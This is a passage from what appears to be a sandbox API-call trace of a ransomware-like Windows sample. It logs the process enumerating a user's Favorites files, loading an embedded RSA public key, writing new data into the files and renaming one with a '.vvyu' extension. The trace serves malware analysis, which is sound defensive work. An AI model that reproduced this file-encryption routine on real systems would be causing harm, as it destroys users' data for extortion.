hHeap=0x620000) returned 1 [0198.738] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.738] WriteFile (in: hFile=0x558, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0198.738] CloseHandle (hObject=0x558) returned 1 [0198.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0198.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x2ea6a68 [0198.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0198.740] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\windows live mail.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Mail.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\windows live mail.url.vvyu")) returned 1 [0198.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.743] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0198.746] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0198.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0198.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.747] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Spaces.url") returned=".url" [0198.747] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x558 [0198.751] GetFileSizeEx (in: hFile=0x558, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=133) returned 1 [0198.751] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0198.754] SetFilePointerEx (in: hFile=0x558, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.754] ReadFile (in: hFile=0x558, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0198.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0198.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.755] SetFilePointer (in: hFile=0x558, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.755] ReadFile (in: hFile=0x558, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x85, lpOverlapped=0x0) returned 1 [0198.755] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0198.755] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.755] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.755] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0198.756] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0198.756] CryptHashData (hHash=0x2cfe180, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.756] CryptGetHashParam (in: hHash=0x2cfe180, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0198.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0198.756] CryptGetHashParam (in: hHash=0x2cfe180, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0198.756] GetLastError () returned 0x0 [0198.757] CryptDestroyHash (hHash=0x2cfe180) returned 1 [0198.757] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0198.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0198.757] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0198.757] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0198.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0198.757] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0198.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0198.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91710 [0198.757] SetFilePointer (in: hFile=0x558, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0198.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0198.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0198.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0198.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0198.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94b58 [0198.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3050 [0198.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94ba0 [0198.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3068 [0198.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3098 [0198.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30f8 [0198.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30b0 [0198.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0198.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0198.758] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0198.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0198.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3098 | out: hHeap=0x620000) returned 1 [0198.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30b0 | out: hHeap=0x620000) returned 1 [0198.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30f8 | out: hHeap=0x620000) returned 1 [0198.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0198.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30f8 [0198.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0198.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea30b0 [0198.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0198.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3098 [0198.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0198.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0198.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0198.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0198.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0198.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0198.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0198.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0198.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0198.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30b0 | out: hHeap=0x620000) returned 1 [0198.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0198.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3098 | out: hHeap=0x620000) returned 1 [0198.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0198.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0198.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30f8 | out: hHeap=0x620000) returned 1 [0198.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0198.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0198.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0198.761] GetCurrentThreadId () returned 0x66c [0198.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0198.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea5fe0 [0198.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0198.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0198.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0198.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0198.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0198.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0198.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.762] GetCurrentThreadId () returned 0x66c [0198.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0198.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0198.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0198.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0198.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaf50 [0198.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0198.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0198.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0198.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30f8 [0198.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0198.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0198.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0198.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0198.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0198.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0198.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0198.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0198.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3098 [0198.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0198.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0198.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0198.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0198.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0198.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0198.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0198.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea30b0 [0198.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0198.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0198.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0198.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3080 [0198.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0198.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3110 [0198.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0198.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0198.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0198.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30e0 [0198.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0198.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30c8 [0198.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0198.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3128 [0198.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30c8 | out: hHeap=0x620000) returned 1 [0198.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea30c8 [0198.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30e0 | out: hHeap=0x620000) returned 1 [0198.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0198.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0198.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0198.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0198.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0198.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3098 | out: hHeap=0x620000) returned 1 [0198.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3098 [0198.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0198.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea6a68 [0198.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30f8 | out: hHeap=0x620000) returned 1 [0198.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0198.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3128 | out: hHeap=0x620000) returned 1 [0198.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6c78 [0198.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0198.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0198.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0198.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0198.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3098 | out: hHeap=0x620000) returned 1 [0198.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6e90 [0198.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0198.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0198.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0198.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0198.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0198.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0198.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0198.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0198.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c78 | out: hHeap=0x620000) returned 1 [0198.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e90 | out: hHeap=0x620000) returned 1 [0198.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0198.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0198.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30c8 | out: hHeap=0x620000) returned 1 [0198.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0198.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3110 | out: hHeap=0x620000) returned 1 [0198.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0198.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30b0 | out: hHeap=0x620000) returned 1 [0198.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3080 | out: hHeap=0x620000) returned 1 [0198.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0198.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0198.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0198.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3068 | out: hHeap=0x620000) returned 1 [0198.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94ba0 | out: hHeap=0x620000) returned 1 [0198.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0198.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0198.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0198.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0198.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0198.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0198.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0198.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0198.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0198.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0198.774] WriteFile (in: hFile=0x558, lpBuffer=0x2e91710*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2e91710*, lpNumberOfBytesWritten=0x312fb14*=0x80, lpOverlapped=0x0) returned 1 [0198.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91710 | out: hHeap=0x620000) returned 1 [0198.775] SetFilePointerEx (in: hFile=0x558, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.775] WriteFile (in: hFile=0x558, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0198.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0198.775] RtlAllocateHeap 